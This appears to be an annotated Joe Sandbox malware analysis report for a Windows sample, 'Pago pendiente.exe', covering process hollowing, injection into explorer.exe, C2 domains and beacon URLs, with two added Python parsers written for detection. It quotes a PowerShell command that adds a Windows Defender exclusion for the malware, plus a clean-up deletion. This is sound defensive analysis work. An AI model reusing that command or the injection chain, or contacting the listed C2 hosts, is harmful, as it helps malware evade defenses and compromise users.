          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00064775 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_00064775
          Source: C:\Users\user\Desktop\Pago pendiente.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
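The behavior lines above record the full hand-off chain: Pago pendiente.exe allocates a page execute-read-write region at the image base 0x400000 of a RegSvcs.exe it has just created, writes a buffer starting with 4D5A ("MZ") into it, RegSvcs.exe then maps an executable section into explorer.exe and queues an APC there, and a later stage (control.exe) spawns cmd.exe to delete the RegSvcs.exe image. In parallel the sample runs powershell.exe with Add-MpPreference -ExclusionPath pointing at itself; that cmdlet only takes effect in an elevated context, and the report does not record whether it succeeded. The script below is an added example, not part of the Joe Sandbox report: it parses a constructed subset of the lines above (the "Source: ... | action: ..." form used here) and correlates them into the findings an analyst would want from a raw behavior log, instead of reading one line at a time. The finding names, the step names and the parser are my own.

```python
import ntpath
import re
from collections import defaultdict

# Constructed input: a subset of the behavior lines from this report, one per string.
# Raw strings keep the Windows backslashes literal.
SAMPLE_LINES = [
    r'Source: C:\Users\user\Desktop\Pago pendiente.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write',
    r'Source: C:\Users\user\Desktop\Pago pendiente.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A',
    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write',
    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread APC queued: target process: C:\Windows\explorer.exe',
    r'Source: C:\Users\user\Desktop\Pago pendiente.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe"',
    r'Source: C:\Users\user\Desktop\Pago pendiente.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"',
    r'Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"',
]

ACTIONS = ("Memory allocated", "Memory written", "Section loaded",
           "Thread APC queued", "Thread register set", "Process created")
# Source paths may contain spaces, so the source is matched lazily up to a known action keyword.
LINE_RE = re.compile(r"^Source: (?P<src>.+?)\s*\|?\s*(?P<action>" + "|".join(ACTIONS) + r"): (?P<rest>.*)$")


def parse_line(line):
    """Split one behavior line into source, action, target and the action-specific detail."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    src, action, rest = m.group("src"), m.group("action"), m.group("rest")
    if action in ("Memory allocated", "Memory written"):
        target, _, detail = rest.partition(" base: ")
    elif action == "Section loaded":
        tm = re.search(r"target: (?P<t>.+?) protection: (?P<p>.+)$", rest)
        target, detail = tm.group("t"), tm.group("p")
    elif action in ("Thread APC queued", "Thread register set"):
        target, detail = rest.replace("target process: ", ""), ""
    else:  # Process created: "<image path> <command line>"
        pm = re.match(r"^(?P<image>.+?\.exe) (?P<cmd>.*)$", rest)
        target, detail = pm.group("image"), pm.group("cmd")
    return {"src": src, "action": action, "target": target, "detail": detail}


def correlate(lines):
    """Return (finding, source image, target image) tuples from a list of behavior lines.

    Injection steps are grouped per (source, target) pair so that a finding is raised
    only when the steps of one technique land on the same victim process.
    """
    events = [e for e in map(parse_line, lines) if e]
    steps = defaultdict(set)   # (source path, target path) -> injection steps observed
    created = []               # (source path, image path, command line)
    for e in events:
        key = (e["src"], e["target"])
        if e["action"] == "Memory allocated" and "execute" in e["detail"]:
            steps[key].add("alloc_rwx")
        elif e["action"] == "Memory written" and e["detail"].endswith("4D5A"):
            steps[key].add("write_mz")          # a whole PE image is being written in
        elif e["action"] == "Section loaded" and "execute" in e["detail"]:
            steps[key].add("map_exec_section")
        elif e["action"] in ("Thread APC queued", "Thread register set"):
            steps[key].add("thread_hijack")
        elif e["action"] == "Process created":
            created.append((e["src"], e["target"], e["detail"]))

    findings, injected_hosts = [], set()
    for (src, target), seen in steps.items():
        if {"alloc_rwx", "write_mz"} <= seen:
            findings.append(("pe_write", ntpath.basename(src), ntpath.basename(target)))
            injected_hosts.add(target)
        if {"map_exec_section", "thread_hijack"} <= seen:
            findings.append(("section_thread_hijack", ntpath.basename(src), ntpath.basename(target)))
            injected_hosts.add(target)
    for src, image, cmd in created:
        low = cmd.lower()
        if "add-mppreference" in low and "-exclusionpath" in low:
            findings.append(("defender_exclusion", ntpath.basename(src), ntpath.basename(image)))
        dm = re.search(r'\bdel\s+"?([^"]+?)"?\s*$', cmd, re.IGNORECASE)
        if dm and dm.group(1) in injected_hosts:   # clean-up of a host this chain injected into
            findings.append(("delete_injected_host", ntpath.basename(src), ntpath.basename(dm.group(1))))
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_LINES):
        print(finding)
```

The pairing on (source, target) is the point: an RWX allocation alone is common, an MZ header written into a freshly created process at its own image base is not, and the APC into explorer.exe is attributed to the already-hollowed RegSvcs.exe rather than to the original sample.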

Stealing of Sensitive Information

Source: Yara match | File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
ATT&CK techniques by tactic (a count in brackets is the number of matching signatures; unnumbered entries are the unpopulated cells of the matrix template):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Shared Modules [1]; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection [812]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading [1]; Disable or Modify Tools [11]; Virtualization/Sandbox Evasion [41]; Process Injection [812]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [4]; Software Packing [12]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery [1]; Security Software Discovery [141]; Process Discovery [2]; Virtualization/Sandbox Evasion [41]; Application Window Discovery [1]; File and Directory Discovery [1]; System Information Discovery [113]; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [2]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph
ID: 1430321 | Sample: Pago pendiente.exe | Start date: 23/04/2024 | Architecture: WINDOWS | Score: 100
Domains/IPs at sample level: www.zgcple.info; www.wonderdread.cloud; 14 other IPs or domains
Signatures at sample level: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 9 other signatures

Process tree:
Pago pendiente.exe (started)
    signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
    -> RegSvcs.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
        -> explorer.exe (injected)
            network: www.tronbank.club 103.224.212.216:80 from local port 49717 (TRELLIAN-AS-APTrellianPtyLimitedAU, Australia); k2securityhn.com 3.33.130.190:80 from local ports 49719 and 49724 (AMAZONEXPANSIONGB, United States); www.airzf.com 154.12.38.29:80 from local port 49721 (UNMETEREDCA, United States)
            signatures: System process connects to network (likely due to code injection or exploit)
            -> control.exe (started)
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                -> cmd.exe (started)
                    -> conhost.exe (started)
    -> powershell.exe (started)
        signatures: Loading BitLocker PowerShell Module
        -> conhost.exe (started)

Source | Detection | Scanner | Label | Link
Pago pendiente.exe | 24% | ReversingLabs
Pago pendiente.exe | 100% | Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://word.office.comon | 0% | URL Reputation | safe
https://powerpoint.office.comcember | 0% | URL Reputation | safe
http://schemas.micro | 0% | URL Reputation | safe
http://tempuri.org/DataSet1.xsd | 0% | Avira URL Cloud | safe
http://www.eternalknot1008.comReferer: | 0% | Avira URL Cloud | safe
http://www.eternalknot1008.com/gs12/ | 0% | Avira URL Cloud | safe
http://www.hjgd.xyz | 0% | Avira URL Cloud | safe
http://www.signomo.com/gs12/www.urxetqt.com | 0% | Avira URL Cloud | safe
http://www.actnowgreen.com/gs12/ | 0% | Avira URL Cloud | safe
http://www.sports565.com/gs12/ | 0% | Avira URL Cloud | safe
http://www.k2securityhn.com/gs12/ | 0% | Avira URL Cloud | safe
http://www.y2llvq.vip/gs12/ | 0% | Avira URL Cloud | safe
http://www.actnowgreen.com | 0% | Avira URL Cloud | safe
http://crl.v | 0% | URL Reputation | safe
http://www.urxetqt.com/gs12/www.hjgd.xyz | 100% | Avira URL Cloud | phishing
http://www.tronbank.club/gs12/ | 0% | Avira URL Cloud | safe
http://www.signomo.comReferer: | 0% | Avira URL Cloud | safe
http://www.umastyle.clubReferer: | 0% | Avira URL Cloud | safe
http://www.zgcple.info/gs12/ | 0% | Avira URL Cloud | safe
http://www.y2llvq.vip | 0% | Avira URL Cloud | safe
http://www.51win.inkReferer: | 0% | Avira URL Cloud | safe
http://www.tronbank.club/gs12/www.signomo.com | 0% | Avira URL Cloud | safe
http://www.sports565.com | 0% | Avira URL Cloud | safe
http://www.51win.ink/gs12/ | 0% | Avira URL Cloud | safe
http://www.airzf.comReferer: | 0% | Avira URL Cloud | safe
http://www.eternalknot1008.com/gs12/www.zgcple.info | 0% | Avira URL Cloud | safe
http://www.lolabeautystudios.com/gs12/www.y2llvq.vip | 0% | Avira URL Cloud | safe
http://www.zgcple.infoReferer: | 0% | Avira URL Cloud | safe
http://www.lolabeautystudios.com | 0% | Avira URL Cloud | safe
http://www.airzf.com/gs12/www.actnowgreen.com | 0% | Avira URL Cloud | safe
http://www.actnowgreen.com/gs12/www.udin88b.us | 0% | Avira URL Cloud | safe
http://www.k2securityhn.comReferer: | 0% | Avira URL Cloud | safe
http://www.hjgd.xyz/gs12/www.airzf.com | 0% | Avira URL Cloud | safe
http://www.y2llvq.vipReferer: | 0% | Avira URL Cloud | safe
http://www.sports565.comReferer: | 0% | Avira URL Cloud | safe
http://www.eternalknot1008.com | 0% | Avira URL Cloud | safe
http://www.umastyle.club | 0% | Avira URL Cloud | safe
http://www.y2llvq.vip/gs12/www.51win.ink | 0% | Avira URL Cloud | safe
http://www.airzf.com | 0% | Avira URL Cloud | safe
http://www.urxetqt.com | 100% | Avira URL Cloud | phishing
http://www.hjgd.xyzReferer: | 0% | Avira URL Cloud | safe
http://www.tronbank.club/gs12/?4h0=l5+ohMyXvfUY1BXURi/VBBPK89EwzQ1xmTW49ppdAXwminvYBxYYysXiCF4Xd1c73Byq&vT=LtxxLba | 0% | Avira URL Cloud | safe
http://www.wonderdread.cloud/gs12/www.umastyle.club | 0% | Avira URL Cloud | safe
http://www.signomo.com | 0% | Avira URL Cloud | safe
www.lolabeautystudios.com/gs12/ | 0% | Avira URL Cloud | safe
http://www.udin88b.us | 0% | Avira URL Cloud | safe
http://www.51win.ink | 0% | Avira URL Cloud | safe
http://www.umastyle.club/gs12/www.sports565.com | 0% | Avira URL Cloud | safe
http://www.lolabeautystudios.comReferer: | 0% | Avira URL Cloud | safe
http://www.51win.ink/gs12/ch_cf | 0% | Avira URL Cloud | safe
http://www.udin88b.usReferer: | 0% | Avira URL Cloud | safe
http://www.lolabeautystudios.com/gs12/ | 0% | Avira URL Cloud | safe
http://www.k2securityhn.com/gs12/?4h0=q59tBajeIo68CyAO1CDG6iJlXnRVkR/RpgQvK7vE3BQj9j+5I7CNTMK9jJbO36qf2KSo&vT=LtxxLba | 0% | Avira URL Cloud | safe
http://www.zgcple.info/gs12/www.k2securityhn.com | 0% | Avira URL Cloud | safe
http://www.tronbank.clubReferer: | 0% | Avira URL Cloud | safe
http://www.wonderdread.cloud | 0% | Avira URL Cloud | safe
http://www.wonderdread.cloud/gs12/ | 0% | Avira URL Cloud | safe
http://www.udin88b.us/gs12/ | 0% | Avira URL Cloud | safe
http://www.hjgd.xyz/gs12/ | 0% | Avira URL Cloud | safe
http://www.urxetqt.comReferer: | 0% | Avira URL Cloud | safe
http://www.umastyle.club/gs12/ | 0% | Avira URL Cloud | safe
http://www.zgcple.info | 0% | Avira URL Cloud | safe
http://www.airzf.com/gs12/?4h0=DR9+51q0CIrIDgcjStoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpz0r/rXmCdIn&vT=LtxxLba | 0% | Avira URL Cloud | safe
http://www.tronbank.club | 0% | Avira URL Cloud | safe
http://www.urxetqt.com/gs12/ | 100% | Avira URL Cloud | phishing
http://www.airzf.com/gs12/ | 0% | Avira URL Cloud | safe
http://www.wonderdread.cloudReferer: | 0% | Avira URL Cloud | safe
http://www.udin88b.us/gs12/www.eternalknot1008.com | 0% | Avira URL Cloud | safe
http://www.signomo.com/gs12/ | 0% | Avira URL Cloud | safe
http://www.k2securityhn.com | 0% | Avira URL Cloud | safe
http://www.sports565.com/gs12/www.lolabeautystudios.com | 0% | Avira URL Cloud | safe
http://www.actnowgreen.comReferer: | 0% | Avira URL Cloud | safe
http://www.signomo.com/gs12/?4h0=sKMZ9JWmyHzsFnuZp0fZtWbmtlVDzCM4ZbYLfRKv+HtPtGiIGUjdRyYwPYcfKf7QGcOF&vT=LtxxLba | 0% | Avira URL Cloud | safe
http://www.k2securityhn.com/gs12/www.wonderdread.cloud | 0% | Avira URL Cloud | safe
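The URL list above is raw string output from process memory, so it needs normalising before it becomes an indicator set: a hostname followed by "Referer:" is a URL with the next header name run onto it, and "http://www.signomo.com/gs12/www.urxetqt.com" is one config entry with the following entry's hostname appended (both readings are my interpretation of the strings, not something the report states). Every entry shares the "/gs12/" path, and the three URLs the sandbox actually contacted carry a "4h0=...&vT=..." query. The script below is an added example, not part of the report or of any Joe Sandbox tooling: it takes a constructed subset of the strings above, strips the debris, splits fused entries, picks the path shared by the most hosts as the C2 path, and separates the beacon URLs. The parameter name "4h0" is taken from the contacted URLs; treating it as the beacon marker is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input: a subset of the memory strings listed in this report, verbatim.
RAW_URL_STRINGS = [
    "http://www.eternalknot1008.comReferer:",
    "http://www.eternalknot1008.com/gs12/",
    "http://www.signomo.com/gs12/www.urxetqt.com",
    "http://www.k2securityhn.com/gs12/?4h0=q59tBajeIo68CyAO1CDG6iJlXnRVkR/RpgQvK7vE3BQj9j+5I7CNTMK9jJbO36qf2KSo&vT=LtxxLba",
    "www.lolabeautystudios.com/gs12/",
    "http://www.hjgd.xyz/gs12/www.airzf.com",
    "http://www.tronbank.club/gs12/?4h0=l5+ohMyXvfUY1BXURi/VBBPK89EwzQ1xmTW49ppdAXwminvYBxYYysXiCF4Xd1c73Byq&vT=LtxxLba",
    "https://word.office.comon",          # benign explorer.exe string with trailing debris
    "http://tempuri.org/DataSet1.xsd",    # .NET schema reference from the loader, not C2
    "http://www.udin88b.us/gs12/",
    "http://www.hjgd.xyz",
]

HEADER_DEBRIS = ("Referer:",)   # header names seen glued to the end of URLs (assumption)
HOST_RE = re.compile(r"^(?:www\.)?[a-z0-9-]+(?:\.[a-z0-9-]+)+$", re.I)


def normalize(raw):
    """Return a list of URL records for one raw string, or [] if it is not a URL.

    A record is {"host", "path", "query", "fused"}; "fused" marks a hostname that was
    split off the end of the previous entry's path.
    """
    s = raw.strip()
    for debris in HEADER_DEBRIS:
        if s.endswith(debris):
            s = s[: -len(debris)]
    if "://" not in s:
        if not s.lower().startswith("www."):
            return []
        s = "http://" + s
    parts = urlsplit(s)
    host = parts.hostname or ""
    if not HOST_RE.match(host):
        return []
    rec = {"host": host, "path": parts.path, "query": parts.query, "fused": False}
    # "/gs12/www.next.tld" -> path "/gs12/" plus a fused next host (assumption, see lead-in)
    m = re.match(r"^(?P<path>/[^/]+/)(?P<next>[^/?]+)$", parts.path)
    if m and HOST_RE.match(m.group("next")):
        rec["path"] = m.group("path")
        return [rec, {"host": m.group("next").lower(), "path": "", "query": "", "fused": True}]
    return [rec]


def c2_profile(raw_strings, beacon_param="4h0"):
    """Derive the C2 path, the host set behind it and the beacon URLs from raw strings."""
    by_path = defaultdict(set)
    fused, beacons = set(), []
    for raw in raw_strings:
        for rec in normalize(raw):
            if rec["fused"]:
                fused.add(rec["host"])
            elif rec["path"]:
                by_path[rec["path"]].add(rec["host"])
            if rec["query"] and re.search(r"(?:^|&)" + re.escape(beacon_param) + "=", rec["query"]):
                beacons.append((rec["host"], rec["path"], rec["query"]))
    if not by_path:
        return {"c2_path": None, "hosts": [], "beacons": beacons}
    c2_path = max(by_path, key=lambda p: len(by_path[p]))   # path shared by most hosts
    return {"c2_path": c2_path, "hosts": sorted(by_path[c2_path] | fused), "beacons": beacons}


if __name__ == "__main__":
    profile = c2_profile(RAW_URL_STRINGS)
    print(profile["c2_path"], len(profile["hosts"]), "hosts")
    for host, path, query in profile["beacons"]:
        print("beacon:", host, path, query[:24] + "...")
```

Bare hostnames such as "http://www.hjgd.xyz" are counted only when the same host also appears with the C2 path or was split off a fused entry, which keeps unrelated strings like the office.com and tempuri.org references out of the indicator set.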
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.airzf.com | 154.12.38.29 | true | false | | unknown
www.udin88b.us | 154.83.2.141 | true | false | | unknown
parkingpage.namecheap.com | 91.195.240.19 | true | false | | high
www.tronbank.club | 103.224.212.216 | true | true | | unknown
signomo.com | 3.33.130.190 | true | true | | unknown
k2securityhn.com | 3.33.130.190 | true | true | | unknown
shops.myshopify.com | 23.227.38.74 | true | false | | unknown
www.umastyle.club | 103.224.212.210 | true | false | | unknown
www.actnowgreen.com | unknown | unknown | true | | unknown
www.zgcple.info | unknown | unknown | true | | unknown
www.wonderdread.cloud | unknown | unknown | true | | unknown
www.urxetqt.com | unknown | unknown | true | | unknown
www.signomo.com | unknown | unknown | true | | unknown
www.k2securityhn.com | unknown | unknown | true | | unknown
www.eternalknot1008.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.tronbank.club/gs12/?4h0=l5+ohMyXvfUY1BXURi/VBBPK89EwzQ1xmTW49ppdAXwminvYBxYYysXiCF4Xd1c73Byq&vT=LtxxLba | true | Avira URL Cloud: safe | unknown
www.lolabeautystudios.com/gs12/ | true | Avira URL Cloud: safe | low
http://www.k2securityhn.com/gs12/?4h0=q59tBajeIo68CyAO1CDG6iJlXnRVkR/RpgQvK7vE3BQj9j+5I7CNTMK9jJbO36qf2KSo&vT=LtxxLba | true | Avira URL Cloud: safe | unknown
http://www.airzf.com/gs12/?4h0=DR9+51q0CIrIDgcjStoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpz0r/rXmCdIn&vT=LtxxLba | false | Avira URL Cloud: safe | unknown
http://www.signomo.com/gs12/?4h0=sKMZ9JWmyHzsFnuZp0fZtWbmtlVDzCM4ZbYLfRKv+HtPtGiIGUjdRyYwPYcfKf7QGcOF&vT=LtxxLba | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.sports565.com/gs12/ | explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
